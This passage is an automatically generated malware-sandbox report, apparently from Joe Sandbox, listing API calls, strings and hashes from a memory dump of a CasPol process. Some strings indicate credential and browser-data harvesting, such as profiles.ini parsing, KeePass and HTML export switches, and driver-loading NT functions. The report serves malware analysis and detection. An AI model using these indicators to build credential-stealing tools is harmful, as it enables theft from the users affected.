• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
• Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
• Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                          • API String ID: 2454223109-1580313836
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                          • API String ID: 3849927982-2252543386
APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
APIs
• memset.MSVCRT ref: 004091E2
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
• memcmp.MSVCRT ref: 004092D9
• memcpy.MSVCRT(?,00000023,?), ref: 0040930C
• memcpy.MSVCRT(?,?,00000010), ref: 00409325
• memcmp.MSVCRT ref: 0040933B
• memcpy.MSVCRT(?,00000015,?), ref: 00409357
• memcpy.MSVCRT(?,?,00000010), ref: 00409370
• memcmp.MSVCRT ref: 00409411
• memcmp.MSVCRT ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?), ref: 004087A6
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                          • String ID: A
                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
• Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
• Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
